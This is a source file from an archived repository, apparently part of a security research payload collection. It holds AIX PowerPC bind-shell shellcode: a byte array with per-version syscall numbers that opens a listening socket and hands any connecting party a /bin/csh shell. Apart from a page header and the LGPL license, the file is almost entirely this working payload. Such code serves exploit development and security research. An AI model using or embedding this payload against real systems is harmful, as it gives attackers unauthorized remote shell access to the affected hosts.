This repository has been archived by the owner on Jan 1, 2023. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 0
/
aix-power-bndsockcode.c
293 lines (282 loc) · 10.6 KB
/
aix-power-bndsockcode.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
/*
* aix-power-bndsockcode.c
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
/*
* Supported AIX versions:
*
* -DAIX614 AIX Version 6.1.4
* -DAIX613 AIX Version 6.1.3
* -DAIX612 AIX Version 6.1.2
* -DAIX611 AIX Version 6.1.1
* -DAIX5310 AIX Version 5.3.10
* -DAIX539 AIX Version 5.3.9
* -DAIX538 AIX Version 5.3.8
* -DAIX537 AIX Version 5.3.7
*
*/
#define BNDSOCKPORT 82
char bndsockcode[]= /* 264 bytes */
"\x7f\xff\xfa\x79" /* xor. r31,r31,r31 */
"\x40\x82\xff\xfd" /* bnel <bndsockcode> */
"\x7f\xc8\x02\xa6" /* mflr r30 */
"\x3b\xde\x01\xff" /* cal r30,511(r30) */
"\x3b\xde\xfe\x1d" /* cal r30,-483(r30) */
"\x7f\xc9\x03\xa6" /* mtctr r30 */
"\x4e\x80\x04\x20" /* bctr */
"\x4c\xc6\x33\x42" /* crorc 6,6,6 */
"\x44\xff\xff\x02" /* svca 0 */
"\x3b\xde\xff\xf8" /* cal r30,-8(r30) */
"\x3b\xa0\x07\xff" /* lil r29,2047 */
"\x7c\xa5\x2a\x78" /* xor r5,r5,r5 */
"\x38\x9d\xf8\x02" /* cal r4,-2046(r29) */
"\x38\x7d\xf8\x03" /* cal r3,-2045(r29) */
#ifdef AIX614
"\x38\x5d\xf8\xf4" /* cal r2,-1804(r29) */
#endif
#ifdef AIX613
"\x38\x5d\xf8\xef" /* cal r2,-1809(r29) */
#endif
#ifdef AIX612
"\x38\x5d\xf8\xef" /* cal r2,-1809(r29) */
#endif
#ifdef AIX611
"\x38\x5d\xf8\xec" /* cal r2,-1812(r29) */
#endif
#ifdef AIX610
"\x38\x5d\xf8\xec" /* cal r2,-1812(r29) */
#endif
#ifdef AIX5310
"\x38\x5d\xf8\xda" /* cal r2,-1830(r29) */
#endif
#ifdef AIX539
"\x38\x5d\xf8\xda" /* cal r2,-1830(r29) */
#endif
#ifdef AIX538
"\x38\x5d\xf8\xda" /* cal r2,-1830(r29) */
#endif
#ifdef AIX537
"\x38\x5d\xf8\xda" /* cal r2,-1830(r29) */
#endif
"\x7f\xc9\x03\xa6" /* mtctr r30 */
"\x4e\x80\x04\x21" /* bctrl */
"\x7c\x7c\x1b\x78" /* mr r28,r3 */
"\x38\xbd\xf8\x11" /* cal r5,-2031(r29) */
"\x3f\x60\xff\x02" /* liu r27,-254 */
"\x63\x7b\x04\xd2" /* oril r27,r27,1234 */
"\x97\xe1\xff\xfc" /* stu r31,-4(r1) */
"\x97\x61\xff\xfc" /* stu r27,-4(r1) */
"\x7c\x24\x0b\x78" /* mr r4,r1 */
#ifdef AIX614
"\x38\x5d\xf8\xf3" /* cal r2,-1805(r29) */
#endif
#ifdef AIX613
"\x38\x5d\xf8\xee" /* cal r2,-1810(r29) */
#endif
#ifdef AIX612
"\x38\x5d\xf8\xee" /* cal r2,-1810(r29) */
#endif
#ifdef AIX611
"\x38\x5d\xf8\xeb" /* cal r2,-1813(r29) */
#endif
#ifdef AIX610
"\x38\x5d\xf8\xeb" /* cal r2,-1813(r29) */
#endif
#ifdef AIX5310
"\x38\x5d\xf8\xd9" /* cal r2,-1831(r29) */
#endif
#ifdef AIX539
"\x38\x5d\xf8\xd9" /* cal r2,-1831(r29) */
#endif
#ifdef AIX538
"\x38\x5d\xf8\xd9" /* cal r2,-1831(r29) */
#endif
#ifdef AIX537
"\x38\x5d\xf8\xd9" /* cal r2,-1831(r29) */
#endif
"\x7f\xc9\x03\xa6" /* mtctr r30 */
"\x4e\x80\x04\x21" /* bctrl */
"\x7c\x84\x22\x78" /* xor r4,r4,r4 */
"\x7f\x83\xe3\x78" /* mr r3,r28 */
#ifdef AIX614
"\x38\x5d\xf8\xf1" /* cal r2,-1807(r29) */
#endif
#ifdef AIX613
"\x38\x5d\xf8\xec" /* cal r2,-1812(r29) */
#endif
#ifdef AIX612
"\x38\x5d\xf8\xec" /* cal r2,-1812(r29) */
#endif
#ifdef AIX611
"\x38\x5d\xf8\xe9" /* cal r2,-1815(r29) */
#endif
#ifdef AIX610
"\x38\x5d\xf8\xe9" /* cal r2,-1815(r29) */
#endif
#ifdef AIX5310
"\x38\x5d\xf8\xd8" /* cal r2,-1832(r29) */
#endif
#ifdef AIX539
"\x38\x5d\xf8\xd8" /* cal r2,-1832(r29) */
#endif
#ifdef AIX538
"\x38\x5d\xf8\xd8" /* cal r2,-1832(r29) */
#endif
#ifdef AIX537
"\x38\x5d\xf8\xd8" /* cal r2,-1832(r29) */
#endif
"\x7f\xc9\x03\xa6" /* mtctr r30 */
"\x4e\x80\x04\x21" /* bctrl */
"\x7c\xa5\x2a\x78" /* xor r5,r5,r5 */
"\x7c\x84\x22\x78" /* xor r4,r4,r4 */
"\x7f\x83\xe3\x78" /* mr r3,r28 */
#ifdef AIX614
"\x38\x5d\xf8\xee" /* cal r2,-1810(r29) */
#endif
#ifdef AIX613
"\x38\x5d\xf8\xe9" /* cal r2,-1815(r29) */
#endif
#ifdef AIX612
"\x38\x5d\xf8\xe9" /* cal r2,-1815(r29) */
#endif
#ifdef AIX611
"\x38\x5d\xf8\xe6" /* cal r2,-1818(r29) */
#endif
#ifdef AIX610
"\x38\x5d\xf8\xe6" /* cal r2,-1818(r29) */
#endif
#ifdef AIX5310
"\x38\x5d\xf8\xd7" /* cal r2,-1833(r29) */
#endif
#ifdef AIX539
"\x38\x5d\xf8\xd7" /* cal r2,-1833(r29) */
#endif
#ifdef AIX538
"\x38\x5d\xf8\xd7" /* cal r2,-1833(r29) */
#endif
#ifdef AIX537
"\x38\x5d\xf8\xd7" /* cal r2,-1833(r29) */
#endif
"\x7f\xc9\x03\xa6" /* mtctr r30 */
"\x4e\x80\x04\x21" /* bctrl */
"\x7c\x7a\x1b\x78" /* mr r26,r3 */
"\x3b\x3d\xf8\x03" /* cal r25,-2045(r29) */
"\x7f\x23\xcb\x78" /* mr r3,r25 */
#ifdef AIX614
"\x38\x5d\xf9\x17" /* cal r2,-1769(r29) */
#endif
#ifdef AIX613
"\x38\x5d\xf9\x11" /* cal r2,-1775(r29) */
#endif
#ifdef AIX612
"\x38\x5d\xf9\x11" /* cal r2,-1775(r29) */
#endif
#ifdef AIX611
"\x38\x5d\xf9\x0e" /* cal r2,-1778(r29) */
#endif
#ifdef AIX610
"\x38\x5d\xf9\x0e" /* cal r2,-1778(r29) */
#endif
#ifdef AIX5310
"\x38\x5d\xf8\xf6" /* cal r2,-1802(r29) */
#endif
#ifdef AIX539
"\x38\x5d\xf8\xf6" /* cal r2,-1802(r29) */
#endif
#ifdef AIX538
"\x38\x5d\xf8\xf6" /* cal r2,-1802(r29) */
#endif
#ifdef AIX537
"\x38\x5d\xf8\xf6" /* cal r2,-1802(r29) */
#endif
"\x7f\xc9\x03\xa6" /* mtctr r30 */
"\x4e\x80\x04\x21" /* bctrl */
"\x7f\x25\xcb\x78" /* mr r5,r25 */
"\x7c\x84\x22\x78" /* xor r4,r4,r4 */
"\x7f\x43\xd3\x78" /* mr r3,r26 */
#ifdef AIX614
"\x38\x5d\xfa\x93" /* cal r2,-1389(r29) */
#endif
#ifdef AIX613
"\x38\x5d\xfa\x85" /* cal r2,-1403(r29) */
#endif
#ifdef AIX612
"\x38\x5d\xfa\x7c" /* cal r2,-1412(r29) */
#endif
#ifdef AIX611
"\x38\x5d\xfa\x67" /* cal r2,-1433(r29) */
#endif
#ifdef AIX610
"\x38\x5d\xfa\x6a" /* cal r2,-1430(r29) */
#endif
#ifdef AIX5310
"\x38\x5d\xf9\xee" /* cal r2,-1554(r29) */
#endif
#ifdef AIX539
"\x38\x5d\xf9\xee" /* cal r2,-1554(r29) */
#endif
#ifdef AIX538
"\x38\x5d\xf9\xee" /* cal r2,-1554(r29) */
#endif
#ifdef AIX537
"\x38\x5d\xf9\xee" /* cal r2,-1554(r29) */
#endif
"\x7f\xc9\x03\xa6" /* mtctr r30 */
"\x4e\x80\x04\x21" /* bctrl */
"\x37\x39\xff\xff" /* ai. r25,r25,-1 */
"\x40\x80\xff\xd4" /* bge <bndsockcode+160> */
"\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd" /* bnel <bndsockcode+208> */
"\x7f\x08\x02\xa6" /* mflr r24 */
"\x3b\x18\x01\xff" /* cal r24,511(r24) */
"\x38\x78\xfe\x29" /* cal r3,-471(r24) */
"\x98\xb8\xfe\x31" /* stb r5,-463(r24) */
"\x94\xa1\xff\xfc" /* stu r5,-4(r1) */
"\x94\x61\xff\xfc" /* stu r3,-4(r1) */
"\x7c\x24\x0b\x78" /* mr r4,r1 */
#ifdef AIX614
"\x38\x5d\xf8\x08" /* cal r2,-2040(r29) */
#endif
#ifdef AIX613
"\x38\x5d\xf8\x08" /* cal r2,-2040(r29) */
#endif
#ifdef AIX612
"\x38\x5d\xf8\x08" /* cal r2,-2040(r29) */
#endif
#ifdef AIX611
"\x38\x5d\xf8\x08" /* cal r2,-2040(r29) */
#endif
#ifdef AIX610
"\x38\x5d\xf8\x07" /* cal r2,-2041(r29) */
#endif
#ifdef AIX5310
"\x38\x5d\xf8\x07" /* cal r2,-2041(r29) */
#endif
#ifdef AIX539
"\x38\x5d\xf8\x07" /* cal r2,-2041(r29) */
#endif
#ifdef AIX538
"\x38\x5d\xf8\x07" /* cal r2,-2041(r29) */
#endif
#ifdef AIX537
"\x38\x5d\xf8\x07" /* cal r2,-2041(r29) */
#endif
"\x7f\xc9\x03\xa6" /* mtctr r30 */
"\x4e\x80\x04\x21" /* bctrl */
"/bin/csh"
;